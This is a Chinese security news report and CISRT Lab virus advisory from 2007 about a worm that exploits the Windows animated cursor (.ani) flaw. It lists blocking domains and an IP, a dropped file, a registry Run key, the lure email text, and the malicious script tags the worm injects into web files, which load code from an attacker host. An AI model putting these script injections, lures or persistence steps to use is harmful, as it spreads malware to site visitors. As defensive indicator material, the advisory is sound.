光標(biāo)漏洞的復(fù)合型蠕蟲(chóng)現(xiàn)身 Vista操作系統(tǒng)曝出首個(gè)重大漏洞

3月30日，微軟Vista操作系統(tǒng)曝出首個(gè)重大漏洞。昨天，瑞星反病毒專家發(fā)現(xiàn)該漏洞已經(jīng)開(kāi)始被黑客利用，使用Windows Vista和XP的用戶，在訪問(wèn)帶毒網(wǎng)站時(shí)會(huì)被威金病毒、盜號(hào)木馬(木馬查殺軟件下載)等多種病毒感染。據(jù)監(jiān)測(cè)，國(guó)內(nèi)已有近十個(gè)網(wǎng)站被黑客攻陷。

此前，微軟公司曾發(fā)出警告稱，攻擊者正在積極利用Windows動(dòng)畫光標(biāo)(.ani)文件中一個(gè)未修復(fù)漏洞。這個(gè)漏洞將影響Windows XP以上操作系統(tǒng)和IE6以上的瀏覽器，微軟最新的Vista和IE7都不能幸免。目前微軟還沒(méi)有發(fā)布此漏洞的補(bǔ)丁。

據(jù)瑞星安全專家介紹，ANI文件是Windows鼠標(biāo)動(dòng)態(tài)光標(biāo)文件，由于Vista等系統(tǒng)在處理ANI文件的方式上存在漏洞，黑客可以構(gòu)造特殊格式的ANI文件，當(dāng)用戶瀏覽含有該文件的網(wǎng)頁(yè)，或點(diǎn)擊該文件就會(huì)自動(dòng)下載運(yùn)行黑客指定的病毒、木馬及后門程序等。目前利用該漏洞的病毒中，威金（Worm.Viking）變種及竊取網(wǎng)絡(luò)游戲的木馬病毒占多數(shù)。

這是Vista系統(tǒng)第一次曝出重大漏洞，利用該漏洞傳播病毒的網(wǎng)站數(shù)量正逐步增多，攻擊代碼很可能已經(jīng)公開(kāi)。

安全專家提醒普通網(wǎng)民不要輕易登陸陌生網(wǎng)站，尤其是通過(guò)電子郵件、聊天軟件等發(fā)送來(lái)的陌生網(wǎng)址。網(wǎng)站的管理員，應(yīng)該加強(qiáng)對(duì)自己服務(wù)器日志的管理，尤其要注意不明來(lái)源的ANI及JPG等格式圖片文件，一旦出現(xiàn)異常盡快處理。

------------------C.I.S.R.T.信息------------------

一個(gè)非常不好的消息要告訴大家，利用微軟動(dòng)畫光標(biāo)漏洞的新蠕蟲(chóng)已經(jīng)現(xiàn)身。我們收到了相關(guān)的樣本，通過(guò)分析，我們已經(jīng)確認(rèn)這是一個(gè)復(fù)合型蠕蟲(chóng)，含有類似熊貓燒香的感染功能、下載其他病毒的功能、發(fā)送含有最新.ani漏洞網(wǎng)址郵件的功能、感染html等文件并向這些文件里添加含有最新漏洞網(wǎng)址的功能。由于危險(xiǎn)程度非常高，CISRT Lab決定再次發(fā)布中度風(fēng)險(xiǎn)警報(bào)，提醒廣大網(wǎng)友提高警惕！

同時(shí)我們建議廣大網(wǎng)友、企業(yè)網(wǎng)管對(duì)以下兩個(gè)域名和IP進(jìn)行屏蔽：

2007ip.com
microfsot.com
61.153.247.76


蠕蟲(chóng)的大小在13K左右，會(huì)釋放文件到以下目錄：

%SYSTEM%\sysload3.exe


添加注冊(cè)表鍵值：

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"


會(huì)發(fā)送郵件：

From: i_lov e_cq@sohu. com
Subject:你和誰(shuí)視頻的時(shí)候被拍下的？給你笑死了！
Body:
看你那小樣！我看你是出名了！
你看這個(gè)地址！你的臉拍的那么清楚！你變明星了！
http://macr.micr of  sot.com/<remove d>/134952.htm


感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件，并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代碼：

<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%6   1%63 %72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>


注意郵件和網(wǎng)頁(yè)中提到的網(wǎng)址中都含有.ani 0-day漏洞的惡意文件。

Kaspersky檢測(cè)為Trojan-Downloader.Win32.Agent.bky，毒霸命名為Worm.MyInfect

目前我們收到樣本的MD5值為

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179


2007.3.31 22:45第一次更新：

作者在蠕蟲(chóng)體內(nèi)表達(dá)了對(duì)Kaspersky的不滿